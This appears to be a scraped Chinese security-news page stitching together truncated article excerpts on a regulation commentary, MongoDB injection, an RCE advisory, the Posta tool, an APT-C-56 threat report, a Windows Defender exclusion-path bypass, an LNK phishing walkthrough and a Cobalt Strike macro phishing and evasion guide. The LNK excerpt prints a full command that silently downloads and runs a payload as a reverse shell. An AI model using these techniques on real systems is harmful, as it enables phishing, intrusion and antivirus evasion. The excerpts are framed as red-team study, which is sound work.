专家解读:《关键信息基础设施保护条例》 云安全

专家解读:《关键信息基础设施保护条例》

前言2021年6月,我国发布《 中华人民共和国数据安全法》, 笔者针对该法编写《 老烦读数据安全法 》一文。承蒙读者厚爱很多热心读者对 该文提供了修订意见及建议。2021年8月备受瞩目的《关键信息基础设施安全保护条例》通过审议发布。一夜之间,很多解读铺天盖地, 笔者闲暇之时阅读几篇颇有感触。 各家之见 各有所长, 充分凸显出行业对关键信息基础设施安全保护的关注。因各类 专家都做出专业解读,本不打算献丑哗众取宠,但各方朋友多方请求,本人勉为其难对该标准相关内容提出个人见解与看法。由于本文仅是个人观点,难以代表解读一词,所以本文以“乱读”作为标题,请各位读者在阅读过程中提供建议和意见,以便完善该文档。本文档虽为公益文档,但1万余字的堆砌尚属不易,望各位在阅读和转发、引用时请注明出处知识无价,但知识需要获得尊重。笔者  樊山2021年8月21日注:本文除篇首声明部分内容以文字形式呈现外,为尊重作者原文,如实保持并呈现原文,以图片形式呈现。再次声明,本文原始版权归樊山先生所有,在发布该文前已征得樊山老师同意,如有转载或引用请注明作者及出处,详情见本文声明页。另外,樊山老师该文原名为《老烦乱读<关键信息基础设施安全保护条例>》,请读着知晓!知识无价,但知识需要获得尊重全文:中华人民共和国个人信息保护法关键信息基础设施安全保护:关键信息基础设施保护五个环节信息安全服务提供方管理要求思维导图李克强签署国务院令 公布《关键信息基础设施安全保护条例》关键信息基础设施安全保护条例浅谈及思维导图2021年七月份恶意软件之“十恶不赦”排行榜数据安全:数据安全能力成熟度模型以色列大学通过研究电源LED指示灯TEMPEST实现声音恢复网络安全等级保护:一起回看等保重要政策文件861号文网络安全等级保护:应急响应计划规范思维导图IT 巨头埃森哲遭勒索软件袭击数据泄露黑客从 Poly Network 窃取价值6 亿美元加密货币红队最喜欢的18 种优秀的网络安全渗透工具 本文始发于微信公众号(祺印说信安):专家解读:《关键信息基础设施保护条例》
阅读全文
数据库|MongoDB漏洞利用姿势 SecIN安全技术社区

数据库|MongoDB漏洞利用姿势

前言 本篇文章记录了mongo数据库的一次漏洞复现,从安装到漏洞复习,然后是实操mongo数据库的SQL手工注入,未授权和SQL注入危害还是蛮大的,由于mongo数据库安全性较高,使用数量极高,所以学习mongo数据库的安全知识还是很有必要的。文章有不对的地方欢迎各位师傅指出~ 简介 MongoDB 是由C++语言编写的,是一个基于分布式文件存储的开源数据库系统。 MongoDB 将数据存储为一个文档,数据结构由键值(key=>value)对组成。MongoDB 文档类似于 JSON 对象。字段值可以包含其他文档,数组及文档数组。 sqlmap不支持这个json格式的 数据库注入,但还有其他工具可以,后面介绍嗷 MongoDB的一些主要特性: 基于文档 高性能 高可用性 简单的可扩展性 没有复杂的联接 数据格式 { name: "ch4nge", age: "10", status: "A", groups: } 默认端口27017、27018、27019、28017 一、安装 1 下载 4.4.10版本 https://www.mongodb.com/try/download/community zip和msi选择区别 1. msi安装的时候,一路下一步,方便快捷,只建议MongoDB4.0及以上版本采用msi方式安装,因为MongoDB4.x版本对msi安装方式进行了优化,随着提示就可以完成配置,但3.x和更低的版本则仍旧需要在安装完毕后,手动做配置,所以低版本不推荐msi方式。 2.zip方式,解压即安装,可以将其安装到任意目录,后续都可以手动进行配置,比较灵活,推荐采用这种方式进行安装。 2 windows安装 双击开始安装 选择自定义Custom安装选项 我这里设置安装路径为C盘根目录 默认下一步即可 勾选的话会安装一个mongodb管理工具,安装速度慢好多,也可以不勾选,后面需要的话再去下载安装 https://www.mongodb.com/try/download/compass 让子弹飞一会 安装完成 图形化管理工具 MongoDBCompass 连接本地数据库 查看数据库 3 windows配置环境 (1)添加环境变量 C:MongoDBbin 测试是否配置成功,在cmd下直接输入mongo -version即可判断 (2)修改配置文件 配置允许远程连接mongodb,bindip设置为0.0.0.0,重启mongo服务生效 windows:mongod.cfg linux:mongod.conf 注意注意:千万不要多写空格少写空格啥的,不然报错。比如我把bindIp冒号后面的空格去掉 (3)将mongodb服务添加到windows服务 如果你的服务列表没有这个的话按照此步骤添加,我是用msi文件安装的,服务里面已经有了 这一步的目的是将来在终端中通过net来管理MongoDB。 以管理员的身份打开终端,输入 mongod --config "C:MongoDBbinmongod.cfg" --install --serviceName "mongodb" 查看服务属性 服务启动关闭的命令 net stop mongodb net start mongodb 远程连接测试 超级弱口令扫它(记得关掉你的windows防火墙嗷) 4 kali2021.2安装mongo (1)导入mongoDB密钥 wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add - 如果收到指示gnupg未安装的错误,则安装gnupg sudo apt-get install gnupg...
阅读全文
亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞 安全漏洞

亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞

一:漏洞描述🐑亿赛通 电子文档安全管理系统 dataimport 存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令二:  漏洞影响🐇亿赛通 电子文档安全管理系统三:  漏洞复现🐋title="电子文档安全管理系统"登录页面如下先获取 core name,访问路径/solr/admin/cores使用POC执行whoami 四:  漏洞POC🦉import requestsimport sysimport randomimport reimport base64import timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title(): print('+------------------------------------------') print('+ 33
阅读全文
Posta:一款功能强大的跨文档信息安全搜索工具 安全工具

Posta:一款功能强大的跨文档信息安全搜索工具

来自 | FreeBuf关于PostaPosta是一款功能强大的跨文档信息安全搜索工具,广大研究人员可以使用Posta来研究跨文档的信息通信,它允许我们跟踪、探测和利用postMessage漏洞,而且还可以重放任何绑定窗口和浏览器之间的消息。工具要求Chrome Chrome / ChromiumNode.js(可选)工具安装开发环境我们可以在专用浏览器(Chromium)中以完整的开发环境运行Posta。首先,我们需要运行下列命令来安装Posta:git clone https://github.com/benso-io/postacd postanpm install接下来,使用下列命令启动专用Chromium会话:node posta <URL>最后,点击Posta扩展并导航至工具用户UI界面。开发模式包含一台本地Web服务器,它负责托管一个小型的测试网站和漏洞利用页面。以开发模式运行时,我们可以访问http://localhost:8080/exploit/来访问漏洞利用页面。Chrome扩展我们还能够以Chrome / Chromium扩展的形式来运行Posta。首先,使用下列命令将该项目源码克隆至本地:git clone https://github.com/benso-io/posta.git接下来,访问chrome://extensions,此时需要确保浏览器为开发者模式。然后点击“Load upacked”,选择Posta中的chrome-extension目录,并将其上传至你的浏览器中,最后加载扩展。将扩展与浏览器绑定之后,访问我们需要测试的网站,点击Posta扩展导航至UI界面即可。工具使用Tabs在Tabs下,你可以找到我们的源地址,其中包含对应的iframe和通信会话。我们可以选择指定的frame,并观察跟该frame相关的postMessages:Messages在Messages中,我们可以检查所有从源地址发送至iframes的postMessage流量。我们可以选择需要深入分析的通信会话,监听器部分会显示负责处理通信的相关代码,点击之后还可以直接拷贝代码内容:Console在Console部分,我们可以修改原始的postMessage流量,并使用篡改后的内容重放消息,这些信息将通过源地址发送至iframe。我们可以通过修改postMessage的内容来查看目标站点是否会受这种攻击方式的影响。如果成功了,我们就可以尝试去从不同的源来利用该漏洞了,这一步可以通过点击“Simulate exploit”实现:Exploit点击“host”按钮即可导航至漏洞利用窗口:在Exploit部分,Posta将会尝试并将特定源托管为iframe来初始化postMessage通信。但如果源网站启用了X-Frame-Options的话,我们大多数时候都无法执行攻击了。因此,为了实现漏洞利用,我们还需要通过初始化window.open方法来获取到跟源地址绑定的通信引用,这里可以点击“Open as tab”来实现。接下来,我们就可以点击“Exploit”按钮,并指定Payload进行跨源通信测试了:项目地址Posta:https://github.com/benso-io/posta版权申明:内容来源网络,版权归原创者所有。除非无法确认,都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。谢谢! 本文始发于微信公众号(网络安全编程与黑客程序员):Posta:一款功能强大的跨文档信息安全搜索工具
阅读全文
Posta:跨文档信息安全搜索工具 安全工具

Posta:跨文档信息安全搜索工具

关于PostaPosta是一款功能强大的跨文档信息安全搜索工具,广大研究人员可以使用Posta来研究跨文档的信息通信,它允许我们跟踪、探测和利用postMessage漏洞,而且还可以重放任何绑定窗口和浏览器之间的消息。工具要求Chrome Chrome / ChromiumNode.js(可选)工具安装开发环境我们可以在专用浏览器(Chromium)中以完整的开发环境运行Posta。首先,我们需要运行下列命令来安装Posta:git clone https://github.com/benso-io/postacd postanpm install接下来,使用下列命令启动专用Chromium会话:node posta <URL>最后,点击Posta扩展并导航至工具用户UI界面。开发模式包含一台本地Web服务器,它负责托管一个小型的测试网站和漏洞利用页面。以开发模式运行时,我们可以访问http://localhost:8080/exploit/来访问漏洞利用页面。Chrome扩展我们还能够以Chrome / Chromium扩展的形式来运行Posta。首先,使用下列命令将该项目源码克隆至本地:git clone https://github.com/benso-io/posta.git接下来,访问chrome://extensions,此时需要确保浏览器为开发者模式。然后点击“Load upacked”,选择Posta中的chrome-extension目录,并将其上传至你的浏览器中,最后加载扩展。将扩展与浏览器绑定之后,访问我们需要测试的网站,点击Posta扩展导航至UI界面即可。工具使用Tabs在Tabs下,你可以找到我们的源地址,其中包含对应的iframe和通信会话。我们可以选择指定的frame,并观察跟该frame相关的postMessages:Messages在Messages中,我们可以检查所有从源地址发送至iframes的postMessage流量。我们可以选择需要深入分析的通信会话,监听器部分会显示负责处理通信的相关代码,点击之后还可以直接拷贝代码内容:Console在Console部分,我们可以修改原始的postMessage流量,并使用篡改后的内容重放消息,这些信息将通过源地址发送至iframe。我们可以通过修改postMessage的内容来查看目标站点是否会受这种攻击方式的影响。如果成功了,我们就可以尝试去从不同的源来利用该漏洞了,这一步可以通过点击“Simulate exploit”实现:Exploit点击“host”按钮即可导航至漏洞利用窗口:在Exploit部分,Posta将会尝试并将特定源托管为iframe来初始化postMessage通信。但如果源网站启用了X-Frame-Options的话,我们大多数时候都无法执行攻击了。因此,为了实现漏洞利用,我们还需要通过初始化window.open方法来获取到跟源地址绑定的通信引用,这里可以点击“Open as tab”来实现。接下来,我们就可以点击“Exploit”按钮,并指定Payload进行跨源通信测试了:项目地址Posta:https://github.com/benso-io/posta 本文始发于微信公众号(盾山实验室):Posta:跨文档信息安全搜索工具
阅读全文
疑似APT-C-56透明部落攻击预警 安全新闻

疑似APT-C-56透明部落攻击预警

APT-C-56   透明部落 APT-C-56(透明部落)别名APT36、ProjectM、C-Major,是一个具有南亚背景的APT组织,长期针对周边国家和地区(特别是印度)的政治、军事目标进行定向攻击活动,开发有自己的专属木马CrimsonRAT,还曾被发现广泛传播USB蠕虫。透明部落在2019年下半年一直非常关注阿富汗地区, 在2020年开始再次转为关注印度用户。到了2021年,先是利用疫情相关信息对印度医疗、电力行业进行信息窃取,随后伪装印度国防部会议记录的诱饵文档尝试进行信息窃取。 近日,360高级威胁研究院在日常情报挖掘中发现并捕获到了多批疑似透明部落攻击印度的文档,恶意文档最终释放NetWireRAT。 恶意文档1 文档标题为Pay and Allowance Details.xls,MD5: c2a38018cf336685e3c760c614bbf4c3,伪装成工资和津贴支付明细的电子表格,打开xls文件后,利用图片欺骗目标人群。这个文档是使用之前版本的Office文档工具创建的,如果想要查看详细内容,则需点击允许编辑按钮,这个按钮实际上是触发xls内部隐藏的恶意宏代码执行的,内部隐藏的是shell命令,同样调用PowerShell。 最终解码后的PowerShell从C&C连接下载后续载荷。 最终下载伪装成GOM Player的恶意文件(MD5:f0b43a3f4821a4cf4b514144b496e4d7),之前APT-C-56(透明部落)在攻击印度的活动中伪装过hgx-player播放器。APT组织攻击过程中一般都尝试伪装成主流、正常使用的程序软件,避免引起用户的警惕怀疑。 该组织的这些组件可能还处于开发、测试过程中,我们捕获到的版本还可以看到Dropper的pdb信息,确认与我们之前发布的报告中的shoot行动一致。 恶意文档2 另一个文档标题为schedule2021.docx (MD5: 23f5fcb554e6b8d0a935ce0474ee5a8e),从标题可以看出攻击行动时间确认是2021年,同样诱使相关人员点击运行允许启用宏按钮,其内部的宏代码就已经开始自动执行。 内部宏代码包含当文档自动打开时候、关闭时候的不同响应函数。 当文档打开的时候,会自动显示文档内容。 当文档更新时候,会从指定C&C下载文件并存放到C:UsersPublicAdobe.exe。 当文档关闭时候,利用shell命令运行下载的二进制文件。 这与我们之前捕获到的另一起攻击事件《APT-C-56(透明部落)近期最新攻击分析与关联疑似Gorgon Group攻击事件分析预警》中的宏代码完全一致。下载Dropper的域名为hxxp://kavachgovrnxyzshedule.exe,C&C网址伪装成印度的相关网站kavachmail.gov, 这个网站是印度政府电子邮件的客户端,之前SideCopy组织曾经使用过hxxp//1492485261/webmail.gov.in/verification/KAVACH。 Dropper Dropper与我们之前的分析一致,GOM player版本的dropper采用了同样的代码,首先同样的弹出对话框,让用户以为自己的组件损坏需要升级,然后加载AmsiScanBuffer并企图通过修改内存关闭。 注册GOM Player自启动。 远程线程注入写入隐藏在PE内部的二进制文件。 代码有一些简单的修改,加载dll的名称产生了一点变化。 创建进程启动方式变化。 RAT 最终跨进程重新写入覆盖的样本是NetwireRAT,其是开源的商业RAT软件。 总结 APT组织之间相互伪装、攻击的事件时有发生,主要是为了迷惑安全厂商分析人员,达到避免暴露自身的目的,印巴区域的这种现象尤为明显。2020年9月,有印度安全厂商声称发现了一个针对印度的攻击组织,并将行动命名为SideCopy,其攻击手法和APT-C-24(响尾蛇)组织是高度相似的。而且同一国家下的APT组织常常技术共享,这也导致可能多个APT组织都使用了相似的攻击技术。 数字化时代已至,在强烈依赖信息网络的情况下,我们提醒广大用户、单位应该提升安全防护意识,增强安全基础设施建设,加大安全投入力度,才能更好的防范网络安全攻击。      附录 IOC 66.154.112212/GOM.exe hxxp://kavachgovrnxyzshedule.exe 643b11c3f6a6ccc41cfd37544b71c0dc 28dc287cc78e195386dc33564dfe449a 23f5fcb554e6b8d0a935ce0474ee5a8e f0b43a3f4821a4cf4b514144b496e4d7 c2a38018cf336685e3c760c614bbf4c3 360高级威胁研究院 360高级威胁研究院是360政企安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提供有力支撑。 相关推荐: Sodinokibi勒索病毒分析 IOC 病毒名称:Sodinokibi勒索病毒 样本名称:CDHFUN.exe MD5: ea4cae3d6d8150215a4d90593a4c30f2 SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e SHA25…
阅读全文
Bypass_AV - Windows Defender 安全文章

Bypass_AV - Windows Defender

0x01 官方文档参考:https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/?view=o365-worldwide我们可以从官方文档里面找到一些关于Def的资料,以及它扫描的时候排除什么,关注什么!通过它的疏忽我们来绕过Windows Defender!0x02 开始查找搜索关键词:Antivirus exclusions我找到了其中一个文档参考文档:https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus?view=o365-worldwide概括本文概述了Windows Server 2016或更高版本上Microsoft Defender防病毒的排除项。由于Microsoft Defender防病毒软件内置于Windows Server 2016 及更高版本中,因此会自动排除操作系统文件和服务器角色。但是,您可以定义自定义排除项。如有必要,您还可以选择退出自动排除。0x03 默认排除项Web 服务器排除项本节列出了安装 Web 服务器角色自动提供的文件夹排除项和进程排除项文件夹排除%SystemRoot%IIS Temporary Compressed Files%SystemDrive%inetpubtempIIS Temporary Compressed Files%SystemDrive%inetpubtempASP Compiled Templates%systemDrive%inetpublogs%systemDrive%inetpubwwwroot进程排除%SystemRoot%system32inetsrvw3wp.exe%SystemRoot%SysWOW64inetsrvw3wp.exe%SystemDrive%PHP5433php-cgi.exe在检测过程中会忽略这些排除项,于是我们就能开始Bypass_AV了。这些文件路径在不冲突的情况下,都能够Bypass Windows Defender!以%SystemDrive%PHP5433php-cgi.exe为例子,我们来进行Bypass 以Windows Server 2016为环境环境下载链接:https://msdn.itellyou.cn/在C:目录下创建PHP5433,使用CS生成.exe文件放置在该目录下运行,看看WIndows Defender是什么反应。成功运行,并且使用Windows Defender扫描不出来。但是在Shell下能否运行需要师傅们自行去测试!相关推荐: WordPress远程命令执行(无需认证,不用插件)https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html- 发现者:Dawid Golunski-  dawid legalhack…
阅读全文
一次假想的LNK钓鱼攻击 安全文章

一次假想的LNK钓鱼攻击

演练流程目标及规定为了获取A集团的资料信息,但目标web网站防护很好,现在收集了A集团一些员工的邮箱,只能通过钓鱼进行攻击。工具由于这是一次隐蔽的行动,所有工具尽可能的使用敌对开源软件。来自某国的开源软件:Ladon、一份加密的有关新冠疫苗的文档、以及用来释放Ladon的LNK文件。攻击流程图实施制作加密文档文档主题根据目标公司性质来决定,如果是进行广撒网式的攻击,可以选择当地国家/地区热点事件,比如新冠疫苗XXXX,这里我采用的是最新!持核酸检测阴性结果返乡不需要隔离,不需要去写什么密码提示,比如查看pasword.txt之类的,这很容易引起怀疑,按照惯性,他/她看见有密码会下意识去点击我们的LNK文件LNK文件制作LNK文件最核心的代码是这个#a.exe即是Ladoncmd.exe /c (echo ”hello“ >D:test1password.txt & start /b D:test1password.txt) & (powershell.exe -nop -w hidden iwr -outf D:test1nc.exe http://vps/download/a.exe & D:test1nc.exe ReverseTcp 192.168.12.201 4444 nc)上面这一串cmd命令的意思是把“hello"写入D:test1password.txt,并打开这个文件,然后从vps服务器上下载a.exe到D:test1目录下命名为nc.exe,最后执行nc.exe ReverseTcp vps 4444 nc 反弹shell到我的vps 监听nc上。最后把这两个文件打包即可。模拟目标行为点击password.txt会释放nc.exe和password.txt到D:test1查看我们的监听可以看到已经上线了。作者:Xznpu,文章来源:先知社区点击上方,关注公众号如文章对你有帮助,请支持点下“赞”“在看” 本文始发于微信公众号(HACK之道):一次假想的LNK钓鱼攻击
阅读全文
红队 | CS加载宏上线初探 安全文章

红队 | CS加载宏上线初探

0x00 前言 邮件钓鱼通常出现在APT攻击里面,但是在日常生活中我们的邮箱也会经常出现一些钓鱼邮件,为了更好的了解原理,我在本地探索了一下宏上线钓鱼邮件,分享出来供师傅们交流。 0x01 原理初探 宏(Macro)是一种批量处理的称谓,是指能组织到一起作为独立的命令使用的一系列Word命令,可以实现任务执行的自动化,简化日常的工作。那么关于宏的安装和录制就不在这里详述了,我们再来把视线转向我们今天的主角——宏病毒 宏病毒是一种寄存在文档或模板的宏中的计算机病毒,存在于数据文件或模板中(字处理文档、数据表格、数据库、演示文档等),使用宏语言编写,利用宏语言的功能将自己寄生到其他数据文档 一旦打开带有宏病毒的文档,宏就会被执行,宏病毒就会被激活,转移到计算机上,驻留在Normal模板上。在此之后所有自动保存的文档都会“感染”上这种宏病毒,如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上  在Word和其他微软Office系列办公软件中,宏分为两种 内建宏:局部宏,位于文档中,对该文档有效,如文档打开(AutoOpen)、保存、打印、关闭等 全局宏:位于office模板中,为所有文档所共用,如打开Word程序(AutoExec) 宏病毒的传播路线如下: 单机:单个Office文档 => Office文档模板 => 多个Office文档(文档到模块感染)网络:电子邮件居多 首先Office文档被感染病毒,当文档打开会执行自动宏,如果宏被执行,它会去检测当前模板是否被感染病毒,如果没有被感染,它会将释放自身的病毒代码。当模板被感染之后,系统中任何一个文档被打开,都会执行模板中的病毒,宏病毒进行传播 宏病毒的感染方案就是让宏在这两类文件之间互相感染,即数据文档、文档模板 宏病毒也可以通过网络进行传播,譬如电子邮件 0x02 宏病毒的实现 0x02.1 本地加载 用cs生成一个Office类型的后门  使用实现设置好的监听器  复制宏代码  新建一个word文档生成一个宏  找到project里面的Word对象,将代码粘贴  ctrl+s保存,这里可以保存成.dotm或.docm都可以,这两个文件格式都是启用宏的Word格式  我这里生成一个.dotm模板文件  这里我假设已经将word发给了我要钓鱼的主机上,可以使用社工的方法使诱导被害者点击启用这个宏,具体方法我就不说了,师傅们自行拓展  点击过后发现已经上线了   看一下上线方式是调用了rundii32.exe这个dll  科普一下rundll32.exe如下: rundll32的正常位置:c:windowssystem32 rundll32.exe是什么?顾名思义,“执行32位或者64位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有 Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe,不必惊慌,这证明用 Rundll32.exe启动了多少个的DLL文件。当然,这些Rundll32.exe执行的DLL文件是什么,我们都可以从系统自动加载的地方找到。 对于Rundll32.exe这个文件,意思上边已经说过,功能就是以命令行的方式调用动态链接程序库。这里要注意一下。在来看看Rundll32.exe使用的函数原型:Void CALLBACK FunctionName (HWND hwnd,HINSTANCE hinst,LPTSTR lpCmdLine,Int nCmdShow); 其命令行下的使用方法为:Rundll32.exe DLLname,Functionname  DLLname为需要执行的DLL文件名;Functionname为前边需要执行的DLL文件的具体引出函数;为引出函数的具体参数。 工作方式 Rundll 执行以下步骤:1. 它分析命令行。2. 它通过 LoadLibrary() 加载指定的 DLL。3. 它通过 GetProcAddress() 获取 <entrypoint> 函数的地址。4. 它调用 <entrypoint> 函数,并传递作为 <optional arguments> 的命令行尾。5. 当 <entrypoint> 函数返回时,Rundll.exe 将卸载 DLL 并退出。 所以说rundll32在杀软里肯定是检测重点,因为他要调用dll,果不其然,被杀,所以我们光制作好钓鱼邮件是不够的,还要能够免杀,这个在下文会提到  0x02.2 远程加载 在word里新建一个模板    将模板另存为一个新的docx   把docx后缀名改为zip后缀  对zip进行解压得到以下几个文件  找到word路径下的_rels目录再找到settings.xml_rels这个文件  我这里用notepad++打开发现这里他是加载了一个远程的网站,因为他要加载模板就会访问远程  这里用github实现远程加载的作用,将之前生成好的.dotm或.docm文件上传到github  将链接复制并在后缀加上?raw=true放入xmlns里  再将这几个文件压缩成zip  改成docx后缀  此时钓鱼邮件就制作好了,这里又假设我已经开始钓鱼,被害人点开了这个文档,还是社工各种方式让被害人点击启用这个宏  回到cs发现已经上线   老生常谈的还是过不了杀软,因为我最近也在看杀软这一部分,其实免杀最好的方法就是自己的方法去免杀,而不是用网上的工具,因为你拿的网上的工具每个人都可以拿到,免杀效果很差。 但是这里我还没有到能够自己免杀的水平,所以这里先用一款工具进行免杀  0x03 免杀 免杀这里我选择了一款软件:EvilClippy github链接如下:https://github.com/outflanknl/EvilClippy/releases/tag/v1.3 关于EvilClippy的介绍如下: EvilClippy是一款专用于创建恶意MS Office测试文档的跨平台安全工具,它可以隐藏VBA宏和VBA代码,并且可以对宏代码进行混淆处理以增加宏分析工具的分析难度。当前版本的EvilClippy支持在Linux、macOS和Windows平台上运行,实现了跨平台特性。 关于EvilClippy的原理如下: EvilClippy使用了OpenMCDF库来修改MS Office的CFBF文件,并利用了MS-OVBA规范和特性。该工具重用了部分Kavod.VBA.Compression代码来实现压缩算法,并且使用了Mono C#编译器实现了在Linux、macOS和Windows平台上的完美运行。 如果有vs环境的可以直接编译生成exe进行运行,命令如下:csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs 我这里用的是在linux环境进行免杀,需要先安装mono环境,我这里是ubuntu系统,如果是kali或cent命令会不一样 sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EFecho "deb http://download.mono-project.com/repo/debian wheezy main" | sudo tee /etc/apt/sources.list.d/mono-xamarin.listsudo apt-get updatesudo apt-get install mono-completesudoapt-get install monodevelop安装好了用mono -V验证一下  先对软件进行编译mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs再查看下软件能否正常运行 mono EvilClippy.exe -h 然后进行免杀操作: 首先需要创建一个vba文件,后续需要进行混淆,vba内容如下Sub Hello()Dim XX=MsgBox("Hello VBS") 科普一下vba文件:VBA(Visual Basic for Applications)是Visual Basic的一种宏语言,是在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件。它也可说是一种应用程式视觉化的 Basic 脚本。VBA stompingVBA 在 Office 文档中可以以下面三种形式存在1、源代码: 宏模块的原始源代码被压缩,并存储在模块流的末尾。可以删除源代码,并不影响宏的执行2、P-Code: 与 VB 语言相同,VBA 同样有 P-Code,通过内置的 VB 虚拟机来解释 P-Code 并执行,平常我们 Alt+F11 打开所看到的正是反编译的 P-Code。3、ExeCodes: 当 P-Code...
阅读全文